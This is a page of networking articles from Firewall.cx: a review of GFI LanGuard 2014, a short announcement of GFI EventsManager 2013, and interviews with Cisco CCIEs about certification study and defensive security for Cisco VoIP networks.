Chapter 6 Cisco Unity Connection
Chapter 7 Cisco Unified IM Presence
Chapter 8 Cisco Unified Contact Center Express
Chapter 9 Cisco IOS UC Applications
Chapter 10 Cisco Collaboration Network Management

 If you are considering sitting for your CCIE Collaboration exam, then this is perhaps one of the most valuable resources you'll need to get your hands on!
  • Hits: 11977

Network Security Product Review: GFI LanGuard 2014 - The Ultimate Tool for Admins and IT Managers

Review by Arani Mukherjee

Network Security GFI Languard 2014 100% ScoreFor a company’s IT department, it is essential to manage and monitor all assets with a high level of effectiveness, efficiency and transparency for users. Centralised management software becomes a crucial tool for the IT department to ensure that all assets are performing at their utmost efficiency, and that they are safeguarded from any anomalies, be it a virus attack, security holes created by unpatched softwares or even the OS.

GFI LanGuard is one such software that promises to provide a consolidated platform from which software, network and security management can be performed, remotely, on all assets under its umbrella. Review of LanGuard Version 2011 was published previously on Firewall.cx by our esteemed colleagues Alan Drury and John Watters. Here are our observations on the latest version of LanGuard 2014. This is something we would call a perspective from a fresh pair of eyes.

Installation

The installation phase has been made seamless by GFI. There are no major changes from the previous version. Worth noting is that near the end of the installation you will be asked to point towards an existing instance of SQL Server, or install one. This might prolong the entire process but, overall, a very tidy installation package. Our personal opinion is to ensure the hardware server has a decent amount of memory and CPU speed to provide the sheer number crunching needs of LanGuard.

First Look: The Dashboard

Once the installation is complete, LanGuard is ready to roll without the need for any OS restarts or a hardware reboot. For the purpose of this review two computers, one running Windows 7 and the other running Linux Ubuntu, were used. The Dashboard is the first main screen the user will encounter:

review-languard-2014-1Main Screen (Click to enlarge)

LanGuard will be able to pick up the machines it needs to monitor from the workgroup it belongs to. Obviously it does show a lot of information at one glance. The section of Common Tasks (lower left corner) is very useful for performing repetitive actions like triggering scans, or even adding computers. Adding computers can be done by looking into the existing domain, by computer name, or even by its IP address. Once LanGuard identifies the computer, and knows more about it from scan results, it allocates the correct workgroup under the Entire Network section.

Below is what the Dashboard looked like for a single device or machine:

review-languard-2014-2(Click to enlarge)

The Dashboard has several sub categories, but we’ll talk about them once we finish discussing the Scan option.

Scan Option

The purpose of this option is to perform the management scan of the assets that need to be monitored via LanGuard. Once the asset is selected LanGuard will perform various types of scans, called audit operations. Each audit operation corresponds to an output of information under several sections for that device. Information ranges from hardware type, software installed, ports being used, patch information etc.

The following screenshot displays a scan in progress on such a device:

review-languard-2014-3LanGuard Scan Option (Click to enlarge)

The progress of the Scan is shown at the top. The bottom section, with multiple tabs, lets the user know the various types of audit operations that are being handled. If any errors occur they appear in the Errors tab. This is very useful in terms of finding out if there are any latent issues with any device that might hamper LanGuard’s functions.

The Dashboard – Computers Tab

Once the Scan is complete, the Dashboard becomes more useful in terms of finding information about the devices. The Computers Tab is a list view of all such devices. The following screenshot shows how the various sections can be used to group and order the devices on the list:

review-languard-2014-4LanGuard Computer Tab (Click to enlarge)

Notice that just above the header named ‘Computer Information’, it asks the user to drag any column header to group the computers using that column. This is a unique feature. This goes to show that LanGuard has given the control of visibility to the user, instead of providing stock views. As well, every column header can be used to set filters. This means the user has multiple viewing options that can be adjusted depending on the need of the hour.

The Dashboard – History Tab

This tab is a listed historical view of all actions that have been taken on a given device. Every device’s functional history is shown, based on which computer has been selected on the left ‘Entire Network’ section. This is like an audit trail that can be used to track the functional progression of the computer. The following screenshot displays the historical data generated on the Windows 7 desktop that was used for our testing.

review-languard-2014-5LanGuard History Tab (Click to enlarge)

Information is sectioned in terms of date, and then further sectioned in terms of time stamps. We found the level of reporting to be very useful and easy to read.

The Dashboard – Vulnerabilities

This is perhaps one of the most important tabs under the Dashboard. At once glance you can find out the main weakness of the machine scanned. All such vulnerabilities are sub divided into Types, based on their level of criticality. If the user selects a type, the actual list of issues comes up in the right hand panel.

Now if the user selects a single vulnerability, a clearer description appears at the bottom. LanGuard not only tells you about the weakness, it also provides valid recommendations on how to deal with it. Here’s a view of our test PC’s desktop’s weaknesses. Thanks to LanGuard, all of them were resolved!

review-languard-2014-6LanGuard Vulnerabilities Tab (Click to enlarge)

The Dashboard – Patches

Like the Vulnerabilities tab, the Patches tab shows the user the software updates and patches that are lacking on the target machine. Below is a screenshot demonstrating this:

review-languard-2014-7LanGuard Patches Tab (Click to enlarge)

Worth noting is the list of action buttons on the panel at the bottom right corner. The user has the option of acknowledging the patch issue or set it to ‘ignore’. The ‘Remediate’ option will be discussed at a later date.

The Dashboard – Ports Tab

The function of the Ports tab is to display which ports are open on the target machine. They are smarty divided into TCP and UDP ports. When the user selects either of the two divisions, the ports are listed in the right panel. Selecting a port displays the process which is using that port, along with the process path. From a network management point of view, with network security in mind, this is an excellent feature to have.

review-languard-2014-8LanGuard Ports Tab (Click to enlarge)

The Dashboard – Software Tab

This tab is a good representation of how well LanGuard scans the target machine and brings out information about it. Any software installed, along with version and authorisation, is listed. An IT manager can use this information to reveal any unauthorised software that might be in use on company machines. This makes absolute sense when it comes to safeguarding company assets from the hazards of pirated software:

review-languard-2014-9LanGuard Software Tab (Click to enlarge)

The Dashboard – Hardware Tab

The main purpose of the Hardware tab is titular, displaying the hardware components of the machines. The information provided is very detailed and can be very useful in maintaining a framework of similar hardware for the IT Infrastructure. LanGuard is very good at obtaining detailed information about a machine and presenting it in a very orderly fashion. Here’s what LanGuard presented in terms of hardware information:

review-languard-2014-10LanGuard Hardware Tab (Click to enlarge)

The Dashboard – System Information

Obviously, LanGuard was providing user specific information along with services and shares on the machines. This shows all the processes and services running on the machines. It also shows all the various user profiles and current users logged onto the machine. It can be used to see if a user is available on a machine, the shares that are listed, and identify them as authorised or not. Same can be done for the users that reside on that machine. As always selecting the System Information List on the right hand panel would display more details on the bottom panel.

review-languard-2014-11LanGuard System Information Tab (Click to enlarge)

Remediate Option

One of the key options for LanGuard, Remediate, is there to ensure all important patches and upgrades necessary for your machines are delivered as and when required. As mentioned earlier in the Dashboard – Patches section, any upgrade or patch that is missing is listed with a Remediate option. But Remediate not only lets the user deploy patches, but it also helps in delivering bespoke software and malware protection. This is a core vital function as it ensures the security of the IT infrastructure along with its integrity. A quick look at the main screen for Remediate clearly defines its utilities:

review-languard-2014-12LanGuard Remediate Main Screen (Click to enlarge)

The level of detail provided and the ease of operation was clearly evident.

Here’s a snapshot of the Software Updates screen. The layout speaks for itself:

review-languard-2014-13LanGuard Deploy Software Updates Screen (Click to enlarge)

Obviously, the user is allowed to pick and choose which updates to deploy and which ones to shelve for the time being.

Activity Monitor Option

This is more of an audit trail of all the actions, whether manually triggered or scheduled, that have been taken by LanGuard. This helps the user to find out if any scan or search has encountered any issues. This gives a bird’s eye view of how well LanGuard is working in the background to ensure the assets are being monitored properly.

The top left panel helps the user to select which audit trail needs to be seen and, based on that, the view dynamically changes to accommodate the relevant information. Here’s what it would look like if one wanted to see the trail of Security Scans:

review-languard-2014-14LanGuard Activity Monitor Option (Click to enlarge)

Reports Option

All the aforementioned information is worth gathering if it can be presented for making commercial and technical decisions. That is where LanGuard presents us with a plethora of reporting options. The sheer volume of options was a bit overwhelming but every report has its own merits. The screen shown in the screenshot below does not even show the bottom of the reports menu, there’s a lot to scroll below as well:

review-languard-2014-15LanGuard Reports Option (Click to enlarge)

Running the Network Security Report provides a level of presentation which played with every detail, and wasn’t confusing with too much information. Here’s what it looked like:

review-languard-2014-16LanGuard Network Security Report (Click to enlarge)

The graphical report was certainly eye catching.

Configuration Option

Clearly LanGuard has not shied away from letting users having the power to tweak the software to their best advantage. Users can scan the network for devices and remotely deploy the agents which would perform the repeated scheduled scans.

review-languard-2014-17LanGuard Configuration Option (Click to enlarge)

LanGuard was unable to scan the Ubuntu box properly and refused to deploy the agent, in spite of being given the right credentials.

A check on GFI’s website for the minimum level of Linux supported showed that the Ubuntu was two versions above the requirements. The scan could recognise it as ‘Probably Unix’ and that’s the most LanGuard managed. We suspect the problem to be related with the system's firewall and security settings.

The following message appeared on the Agent Dialog box when trying to deploy it on the Linux machine: “Not Supported for this Operating System”

review-languard-2014-18Minor issues identifing our Linux workstation (Click to enlarge)

Moving on to LanGuard’s latest offering, the ability to manage mobile devices. This is a new addition to LanGuard’s arsenal. It can manage and monitor mobile devices that use an Microsoft Exchange Server for email access etc. Company smart phones and tablets can be managed using this new tool. Here’s the interface for the same purpose.

review-languard-2014-19LanGuard Managing Mobile Devices (Click to enlarge)

Utilities Option

We call it the Swiss Army Knife for network management. One of our favourite sections, it included some quick and easy way of checking network features of any devices or an IP Address. This just goes to prove that LanGuard is very well thought out piece of software. Not only does it include mission critical functions, it also provides a day to day point of mission control for the IT Manager.

We could not stop ourselves from performing a quick check on the output from the Whois option here:

review-languard-2014-21LanGuard Whois using Utilities (Click to enlarge)

The other options were pretty self-explanatory and of course very handy for a network manager.

Final Verdict

LanGuard provides an impressive set of tools. The process of adding machines, gathering information and then displaying the information is very efficient. The reporting is extremely resourceful and caters to every need possible for an IT Manager. Hoping the lack of support for Linux is an isolated incident. It has grabbed the attention of this reviewer to the point that he is willing to engage his own IT Manager and query what software his IT Department uses.

If it’s not LanGuard, there’s enough evidence here to put a case for this brilliant piece of software. LanGuard is a very good tool and should be part of an IT Manager’s or Administrator’s arsenal when it comes to managing a small to large enterprise IT Infrastructure.

 

 

 

  • Hits: 26804

Interview: Kevin Wallace CCIEx2 #7945 (Routing/Switching and Voice) & CCSI (Instructor) #20061

ccie-kevin-wallaceKevin Wallace is a well-known name in the Cisco industry. Most Cisco engineers and Cisco certification candidates know Kevin from his Cisco Press titles and the popular Video Mentor training series.  Today, Firewall.cx has the pleasure of interviewing Kevin and revealing how he managed to become one of the world's most popular CCIEs, which certification roadmap Cisco candidates should choose, which training method is best for your certification and much more.

Kevin Wallace, CCIEx2 (R/S and Voice) #7945, is a Certified Cisco Systems Instructor (CCSI #20061), and he holds multiple Cisco certifications, including CCNP Voice, CCSP, CCNP, and CCDP, in addition to multiple security and voice specializations. With Cisco experience dating back to 1989 (beginning with a Cisco AGS+ running Cisco IOS 7.x). Kevin has been a network design specialist for the Walt Disney World Resort, a senior technical instructor for SkillSoft/Thomson NETg/KnowledgeNet, and a network manager for Eastern Kentucky University. Kevin holds a Bachelor of Science Degree in Electrical Engineering from the University of Kentucky. Kevin lives in central Kentucky with his wife (Vivian) and two daughters (Stacie and Sabrina).

Firewall.cx Interview Questions

Q1. Hello Kevin and thanks for accepting Firewall.cx’s invitation. Can you tell us a bit about yourself, your career and daily routine as a CCIE (Voice) and Certified Cisco Systems Instructor (CCSI)?

Sure. As I was growing up, my father was the central office supervisor at the local GTE (General Telephone) office. So, I grew up in and around a telephone office. In college, I got a degree in Electrical Engineering, focusing on digital communications systems. Right out of college, I went to work for GTE Laboratories where I did testing of all kinds of telephony gear, everything from POTS (Plain Old Telephone Service) phones to payphones, key systems, PBX systems, and central office transmission equipment.

Then I went to work for a local university, thinking that I was going to be their PBX administrator but, to my surprise, they wanted me to build a data network from scratch, designed around a Cisco router. This was about 1989 and the router was a Cisco AGS+ router running Cisco IOS 7.x. And I just fell in love with it. I started doing more and more with Cisco routers and, later, Cisco Catalyst switches.

Also, if you know anything about my family and me you know we’re huge Disney fans and we actually moved from Kentucky to Florida where I was one of five Network Design Specialists for Walt Disney World. They had over 500 Cisco routers (if you count RSMs in Cat 5500s) and thousands of Cisco Catalyst switches. Working in the Magic Kingdom was an amazing experience.

However, due to a family health issue we had to move back to KY where I started teaching classes online for KnowledgeNet (a Cisco Learning Partner). This was in late 2000 and, even though we’ve been through a couple of acquisitions (first Thomson NETg and then Skillsoft), we’re still delivering Cisco authorized training live and online.

Being a Cisco trainer has been a dream job for me because it lets me stay immersed in Cisco technologies all the time. Of course I need, and want, to keep learning. I’m always in pursuit of some new certification. Just last year I earned my second CCIE, in Voice. My first CCIE, in Route/Switch, came way back in 2001.

In addition to teaching live online Cisco courses (mainly focused on voice technologies), I also write books and make videos for Cisco Press and have been for about the last ten years.

So, to answer your question about my daily routine: it’s a juggling act of course delivery and course development projects for Skillsoft and whatever book or video title I’m working on for Cisco Press.

Q2. We would like to hear your personal opinion on Firewall.cx’s technical articles covering Cisco technologies, VPN Security and CallManager Technologies. Would you recommend Firewall.cx to Cisco engineers and certification candidates around the world?

Firewall.cx has an amazing collection of free content. Much of the reference material is among the best I’ve ever seen. As just one example, the Protocol Map Cheat Sheet in the Downloads area is jaw-dropping. So, I would unhesitatingly recommend Firewall.cx to other Cisco professionals.

Q3. As a Cisco CCIE (Voice) and Certified Cisco Systems Instructor (CCSI) with more than 14 years experience, what preparation techniques do you usually recommend to students/engineers who are studying for Cisco certifications?

For me, it all starts with goal setting. What are you trying to achieve and why? If you don’t have a burning desire to achieve a particular certification, it’s too easy to run out of gas along your way.

You should also have a clear plan for how you intend to achieve your goal. “Mind mapping” is a tool that I find really useful for creating a plan. It might, for example, start with a goal to earn your CCNA. That main goal could then be broken down into subgoals such as purchasing a CCNA book from Cisco Press, building a home lab, joining an online study group, etc. Each of those subgoals could then be broken down even further.

Also, since I work for a Cisco Learning Partner (CLP), I’m convinced that attending a live training event is incredibly valuable in certification preparation. However, if a candidate’s budget doesn’t permit that I recommend using Cisco Press books and resources on Cisco’s website to self-study. You’ve also got to “get your hands dirty” working on the gear. So, I’m a big fan of constructing a home lab.

When I was preparing for each of my CCIE certifications, I dipped into the family emergency fund in order to purchase the gear I needed to practice on. I was then able to sell the equipment, nearly at the original purchase price, when I finished my CCIE study.

But rather than me rattling on about you should do this and that, let me recommend a super inexpensive book to your readers. It’s a book I wrote on being a success in your Cisco career. It’s called, “Your Route to Cisco Career Success,” and it’s available as a Kindle download (for $2.99) from Amazon.com.

If anyone reading this doesn’t have a Kindle reader or app, the book is also available as a free .PDF from the Products page of my website, 1ExamAMonth.com/products.

Q4. In today’s fast paced technological era, which Cisco certifications do you believe can provide a candidate with the best job opportunities?

I often recommend that certification candidates do a search on a job website, such as dice.com or monster.com, for various Cisco certs to see what certifications are in demand in their geographical area.

However, since Cisco offers certifications in so many different areas, certification candidates can pick an area of focus that’s interesting to them. So, I wouldn’t want someone to pursue a certification path just because they thought there might be more job opportunities in that track if they didn’t have an interest and curiosity about that field.

Before picking a specific specialization, I do recommend that everyone demonstrate that they know routing and switching. So, my advice is to first get your CCNA in Routing and Switching and then get your CCNP. At that point, decide if you want to specialize in a specific technology area such as security or voice, or if you want to go even deeper in the Routing and Switching arena and get your CCIE R/S.

Q5. There is a steady rise on Cisco Voice certifications and especially the CCVP certification. What resources would you recommend to readers who are pursuing their CCVP certification that will help them prepare for their exams?

Interestingly, Cisco has changed the name of the CCVP certification to the CCNP Voice certification, and it’s made up of five exams: CVOICE, CIPT1, CIPT2, TVOICE and CAPPS. Since I teach all of these classes live and online, I think that’s the best preparation strategy. However, it is possible to self-study for those exams. Cisco Press offers comprehensive study guides for the CVOICE, CIPT1 and CIPT2 exams. However, you’ll need to rely on the exam blueprints for the TVOICE and CAPPS exams, where you take each blueprint topic and find a resource (maybe a book, maybe a video, or maybe a document on Cisco’s website) to help you learn that topic.

For hands-on experience, having a home lab is great. However, you could rent rack time from one of the CCIE Voice training providers or purchase a product like my CCNP Voice Video Lab Bundle, which includes over 70 videos of lab walkthroughs for $117.

Q6. What is your opinion on Video based certification training as opposed to text books – Self Study Guides?

Personally I use, and create, both types of study materials. Books are great for getting deep into the theory and for being a real-world reference. However, for me, there’s nothing like seeing something actually configured from start to finish and observe the results. When I was preparing for my CCIE Voice lab I would read about a configuration, but many times I didn’t fully understand it until I saw it performed in a training video.

So, to answer your question: instead of recommending one or the other, I recommend both.

We thank Kevin Wallace for his time and interview with Firewall.cx.

 

 

  • Hits: 24084

Interview: Vivek Tiwari CCIEx2 #18616 (CCIE Routing and Switching and Service Provider)

CCIE Interview - Vivek Tiwari CCIE #18616  (CCIE Routing and Switching and Service Provider)Vivek Tiwari holds a Bachelor’s degree in Physics, MBA and many certifications from multiple vendors including Cisco’s CCIE.  With a double CCIE on R&S and SP track under his belt he mentors and coaches other engineers. 

Vivek has been working in the Inter-networking industry for more than fifteen years, consulting for many Fortune 100 organizations. These include service providers, as well as multinational conglomerate corporations and the public sector. His five plus years of service with Cisco’s Advanced Services has gained him the respect and admiration of colleagues and customers alike.

His experience includes, but is not limited to, network architecture, training, operations, management and customer relations, which made him a sought after coach and mentor, as well as a recognized leader. 

He is also the author of the following titles:

 “Your CCIE Lab Success Strategy the non-Technical guidebook

“Stratégie pour réussir votre Laboratoire de CCIE”

“Your CCNA Success Strategy Learning by Immersing – Sink or Swim”

“Your CCNA Success Strategy the non-technical guidebook for Routing and Switching”

Q1.  Hello Vivek and thanks for accepting Firewall.cx’s invitation for this interview.   Can you let us know a bit more about your double CCIE area of expertise and how difficult the journey to achieve it was?

I have my CCIE in Routing and Switching and Service Provider technologies. The first CCIE journey was absolutely difficult. I was extremely disappointed when I failed my lab the first time. This is the only exam in my life that I had not passed the first time. However, that failure made me realize that CCIE is difficult but within my reach. I realized the mistakes I was making, persevered and eventually passed Routing and Switching CCIE in about a year’s time.

After the first CCIE I promised myself never to go through this again but my co-author Dean Bahizad convinced me to try a second CCIE and surprisingly it was much easier this time and I passed my Service Provider lab in less than a year’s time.

We have chronicled our story and documented the huge number of lessons learned in our book Your CCIE Lab Success Strategy the non-technical guidebook. This book has been reviewed by your website and I am proud to state has been helping engineers all over the globe.

Q2. As a globally recognised and respected Cisco professional, what do you believe is the true value of Firewall.cx toward its readers?

Firewall.cx is a gem for its readers globally. Any article that I have read to date on Firewall.cx is well thought of and has great detailed information. The accompanying diagrams are fantastic. The articles get your attention and are well written because I have always read the full article and have never left it halfway.

The reviews for books are also very objective and give you a feel for it. Overall this is a great service to the network engineer community.

Thanks for making this happen.

Q3. Could you describe your daily routine as a Cisco double CCIE?

My daily routine as a CCIE depends on the consulting role that I am playing at that time. I will describe a few of them:

Operations: being in operations you will always be on the lookout for what outages happened in the last 24 hours or in the last week. Find the detailed root cause for it and suggest improvements. These could range from a change in design of the network to putting in new processes or more training at the appropriate levels.

Architecture: As an architect you are always looking into the future and trying to interpret the current and future requirements of your customer. Then you have to extrapolate these to make the network future proof for at least 5 to 7 years. Once that is done then you have to start working with network performance expected within the budget and see what part of the network needs enhancement and what needs to be cut.

This involves lots of meetings and whiteboard sessions.

Mix of the Above: After the network is designed you have to be involved at a pilot site where you make your design work with selected operations engineers to implement the new network. This ensures knowledge transfer and also proves that the design that looked good on the board is also working as promised.

All of the above does need documentation so working with Visio, writing white papers, implementation procedures and training documents are also a part of the job. Many engineers don’t like this but it is essential.

Q4. There are thousands of engineers out there working on their CCNA, CCNP and CCVP certifications.  Which certification do you believe presents the biggest challenge to its candidates?

All certifications have their own challenges. This challenge varies from one individual to another. However, in my mind CCNA is extremely challenging if it is done the proper way. I say this because most of the candidates doing CCNA are new to networking and they have not only to learn new concepts of IP addressing and routing but also have to learn the language of typing all those commands and making it work on a Cisco Device.

The multitude of learning makes it very challenging. Candidates are often stuck in a maze running from one website to another or studying one book and then another without any real results. That is the reason we have provided a GPS for CCNA, our book “Your CCNA exam Success Strategy the non-technical guidebook

I also want to point out that whenever we interview CCNA engineers many have the certificate but it seems they have not spent the time to learn and understand the technologies.

What they don’t understand is that if I am going to depend on them to run my network which has cost my company millions of dollars I would want a person with knowledge not just a certificate.

Q5. What resources do you recommend for CCNA, CCNP, CCVP and CCIE candidates, apart from the well-known self-study books?

Apart from all the books the other resources to have for sure are

  1. A good lab. It could be made of real network gear or a simulator, but you should be able to run scenarios on it.
  2. Hands on practice in labs.
  3. Be curious while doing labs and try different options (only on the lab network please)
  4. A positive attitude to learning and continuous improvement.
    a) Write down every week what you have done to improve your skills
    b) Don’t be afraid to ask questions.
  5. Lastly and most important have a mentor. Follow the guidelines in our book about choosing a mentor and how to take full advantage of a mentor. Remember a mentor is not there to spoon feed you: a mentor is there to make sure you are moving in the right direction and in case you are stuck to show you a way out (not to push you out of it). A mentor is a guide not a chauffeur.

Q6. When looking at the work of other Cisco engineers, e.g network designs, configurations-setup etc, what do you usually search for when trying to identify a knowledgeable and experienced Cisco engineer?

I usually do not look at a design and try to find a flaw in it. I do make a note of design discrepancies that come to my mind. I say that from experience because what you see as a flaw might be a design requirement. For example, I have seen that some companies send all the traffic coming inside from the firewall across the data center to a dedicated server farm where it is analysed and then sent across to the different parts of the company. It is very inefficient and adds delay but it is by design.

I have seen many differences in QOS policies even between different groups within the organizations.

If a network design satisfies the legal, statutory and organization requirements then it is the best design.

Q7. What advice would you give to our readers who are eager to become No.1 in their professional community? Is studying and obtaining certifications enough or is there more to it?

Studying is important but more important is to understand it and experience it. Obtaining certifications has become necessary now because that is one of the first ways that a candidate can prove to their prospective employer that they have learnt the technologies. If an employer is going to let you work on his network that will cost him thousands of dollars per minute of downtime (think eBay, amazon, PayPal, a car assembly line) or could even cost lives of people (think of a hospital network, or the emergency call network like the 911 in US, or the OnStar network in US) then they’d better be careful in hiring. I am sure you agree. Certification is what gets you in the door for an interview only but it is:

  • Your knowledge and understanding
  • Your experience
  • Your attitude towards your work
  • How well you work in teams
  • Which work related areas are of interest to you (Security, Voice, Wireless etc.) that gets you the job and makes you move ahead in your career.

The best way to move ahead and be No. 1 in your career is to do what you are passionate about. If you are pursuing your passion then it is not work anymore and you enjoy doing it and will excel beyond limits.

Another thing I would want to tell the readers is don’t chase money. Chase excellence in whatever you are doing and money will be the positive side effect of your excellence.

 

  • Hits: 33889

The New GFI EventsManager 2013 - Active Network and Server Monitoring

On the 21st of January 2013, GFI announced its new version of its popular GFI EventsManager, now named, GFI EventsManager 2013.

For those who are unaware of the product, GFI EventsManager is one of the most popular software solutions that allows a network administrator, engineer or IT manager to actively monitor a whole IT infrastructure from a single intuitive interface.

Even though GFI EventsManager has been in continuous development, this time GFI has surprised us once again by introducing highly anticipated features that make this product a one-of-a-kind winner.

gfi-eventsmanager-2013-features-1

Below is a list of some of the new features included in GFI EventsManager 2013 that make this product a must for any company:

  • Active network and server monitoring based on monitoring checks is now available and can function in conjunction with the log based monitoring system in order to provide a complete and thorough view of the status of your environment.
  • The unique combination of active network and server monitoring through log-based network and server monitoring provides you not only with incident identification but also with a complete set of logs from the assets that failed, making problem investigation and solving much easier.
  • Enhanced console security system helps complying with 'best practices' recommendations that imply access to data on a “need-to-know” basis. Starting with this version, each GFI EventsManager user can be assigned a subset of computers that he/she manages and the console will only allow usage of the data coming from those configured computers while the user is logged in.
  • New schema for parsing XML files, available by default, that enables monitoring of XML–based logs and configuration files.
  • New schema for parsing DHCP text logs that enables monitoring of DHCP IP assignment.
  • More flexibility for storing events: the new database system has been updated to include physical deletion of events for easier maintenance and collection to remote databases.
  • Hashing of log data for protection against attempts at tampering with the logs coming from outside the product, enables enhanced log consolidation and security.
  • New reports for J Sox and NERC CIP compliance.
  • Hits: 14857

Interview: Akhil Behl CCIEx2 #19564 (Voice & Security)

It's not everyday you get the chance to interview a CCIE, and especially a double CCIE!  Today, Firewall.cx interviews Akhil Behl, a Double CCIE (Voice & Security) #19564 and author of the popular Cisco Press title ‘Securing Cisco IP Telephony Networks'.

Akhil Behl's Biography

ccies author akhil behlAkhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers.

Be sure to not to miss our on our review of Akhil's popular Securing Cisco IP Telephony Networks and outstanding article on Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS.

Readers can find outstanding Voice Related Technical Articles in our Cisco VoIP/CCME & CallManager Section.

Interview Questions

Q1. What are the benefits of a pure VoIP against a hybrid system?

Pure VoIP solutions are a recent addition to the overall VoIP portfolio. SIP trunks by service providers are helping covert PSTN world reachable by IP instead of TDM. A pure VoIP system has a number of advantages over a hybrid VoIP system for example:

  • All media and signaling is purely IP based and no digital or TDM circuits come into picture. This in turn implies better interoperability of various components within and outside the ecosystem.
  • Configuration, troubleshooting, and monitoring of a pure VoIP solution is much more lucid as compared to a hybrid system.
  • The security construct of a pure VoIP system is something which the provider and consumer can mutually agree upon and deploy. In other words, the enterprise security policies can now go beyond the usual frontiers up to the provider’s soft-switch/SBC.

Q2. What are the key benefits/advantages and disadvantages of using Cisco VoIP Telephony System, coupled with its security features?

Cisco’s IP Telephony / Unified Communications systems present a world class VoIP solution to consumers from small to medium to large enterprises and SMB’s as well as various business verticals such as education, finance, banking, energy sector, and government agencies. When the discussion is around security aspect of Cisco IP Telephony / UC solution, the advantages outweigh the disadvantages because of a multitude of factors:

  • Cisco IP Telephony endpoints, and underlying network gear is capable of providing robust security by means of built in security features
  • Cisco IP Telephony portfolio leverages industry standard cryptography and is compatible with any product based on RFC standards
  • Cisco engineering leaves no stone unturned to ensure that the IP Telephony products and applications deliver feature rich consumer experience; while maintaining a formidable security posture
  • Cisco Advanced Services helps consumers design, deploy, operate, and maintain a secure, stable, and robust Cisco IP Telephony network
  • Cisco IP Telephony and network applications / devices / servers can be configured on-demand to enable security to restrain a range of threats

Q3. As an author, please comment on the statement that your book can be used both as a reference and as a guide for security of Cisco IP Telephony implementation.

Over the past 10 years, I have seen people struggling with lack of a complete text which can act as a reference, a guide, and a companion to help resolve UC security queries pertinent to design, deployment, operation, and maintenance of a Cisco UC network. I felt there was a lack of a complete literature which could help one through various stages of Cisco UC solution development and build i.e. Plan, Prepare, Design, Implement, Operate, and Optimize (PPDIOO) and thought of putting together all my experience and knowledge in form of a book where the two realms i.e. Unified Communications and Security converge. More often than not, people from one realm are not acquainted with intricacies of the other. This book serves to fill in the otherwise prominent void between the UC and Security realms and acts as a guide and a reference text for professionals, engineers, managers, stakeholders, and executives.

Q4. What are today’s biggest security threats when dealing with Cisco Unified Communication installations?

While there are a host of threats out there which lurk around your Cisco UC solution, the most prominent ones are as follows:

  • Toll-Fraud
  • Eavesdropping
  • Session/Call hijacking
  • Impersonation or identity-theft
  • DOS and DDOS attacks
  • Poor or absent security guidelines or policy
  • Lack of training or education at user level on their responsibility towards corporate assets such as UC services

As you can see, not every threat is a technical threat and there’re threats pertinent to human as well as organizational factors. More often than not, the focus is only on technical threats while, organizations and decision makers should pay attention to other (non-technical) factors as well without which a well-rounded security construct is difficult to achieve.

Q5. When implementing SIP Trunks on CUCM/CUBE or CUCME, what steps should be taken to ensure Toll-Fraud is prevented?

An interesting question since, toll-fraud is a chronic issue. With advent of SIP trunks for PSTN access, the threat surface has evolved and a host of new threats comes into picture. While most of these threats can be mitigated at call-control and Session Border Controller (CUBE) level, an improper configuration of call restriction and privilege as well as a poorly implemented security construct can eventually lead to a toll-fraud. To prevent toll-fraud on SIP trunks following suggestions can be helpful:

  • Ensure that users are assigned the right calling search space (CSS) and partitions (in case of CUCM) or Class of Restriction (COR in case of CUCME)  at line/device level to have a granular control of who can dial what
  • Implement after-hour restrictions on CUCM and CUCME
  • Disable PSTN or out-dial from Cisco Unity, Unity Connection, and CUE or at least restrict it to a desirable local/national destination(s) as per organization’s policies
  • Implement strong pin/password policies to ensure user accounts cannot be compromised by brute force or dictionary based attacks
  • For softphones such as Cisco IP Communicator try and use extension mobility which gives an additional layer of security by enabling user to dial international numbers only when logged in to the right profile with right credentials
  • Disable PSTN to PSTN tromboning of calls is not required or as per organizational policies
  • Where possible enable secure SIP trunks and SIP authorization for trunk registration with provider
  • Implement COR where possible at SRST gateways to discourage toll-fraud during an SRST event
  • Monitor usage of the enterprise UC solution by call billing and reporting software (e.g. CAR) on an ongoing basis to detect any specific patterns or any abnormal usage

Q6. A common implementation of Cisco IP Telephony is to install the VoIP Telephony network on a separate VLAN – the Voice VLAN, which has restricted access through access lists applied on a central layer-3 switch. Is this common practice adequate to provide basic-level of security?

Well, I wouldn’t just filter the traffic at Layer 3 with access-lists or just do VLAN segregation at layer 2 but also enable security features such as:

  • Port security
  • DHCP snooping
  • Dynamic ARP Inspection (DAI)
  • 802.1x
  • Trusted Relay Point (TRP)
  • Firewall zoning

and so on, throughout the network to ensure that legitimate endpoints in voice VLAN (whether hard phones or softphones) can get access to enterprise network and resources. While most of the aforementioned features can be enabled without any additional cost, it’s important to understand the impact of enabling these features in a production network as well as to ensure that they are in-line with the corporate/IP Telephony security policy of the enterprise.

Q7. If you were asked to examine a customer’s VoIP network for security issues, what would be the order in which you would perform your security checks? Assume Cisco Unified Communications Manager Express with IP Telephones (wired & wireless), running on Cisco Catalyst switches with multiple VLANs (data, voice, guest network etc) and Cisco Aironet access points with a WLC controller. Firewall and routers exist, with remote VPN teleworkers

My first step towards assessing the security of the customer’s voice network will be to ask them for any recent or noted security incidents as it will help me understand where and how the incident could have happened and what are the key security breach or threats I should be looking at apart from the overall assessment.

I would then start at the customer’s security policy which can be a corporate security policy or an IP Telephony specific security policy to understand how they position security of enterprise/SMB communications in-line with their business processes. This is extremely important as, without proper information on what their business processes are and how security aligns with them I cannot advise them to implement the right security controls at the right places in the network. This also ensures that the customer’s business as usual is not interrupted when security is applied to the call-control, endpoints, switching infrastructure, wireless infrastructure, routing infrastructure, at firewall level, and for telecommuters.

Once I have enough information about the customer’s network and security policy, I will start at inspection of configuration of access switches, moving down to distribution, to core to data center access. I will look at the WLC and WAP configurations next followed by IOS router and firewall configuration.

Once done at network level, I will continue the data collection and analysis at CUCME end. This will be followed by an analysis of the endpoints (wired and wireless) as well as softphones for telecommuters.

At this point, I should have enough information to conduct a security assessment and provide a report/feedback to the customer and engage with the customer in a discussion about the opportunities for improvement in their security posture and construct to defend against the threats and security risks pertinent to their line of business.

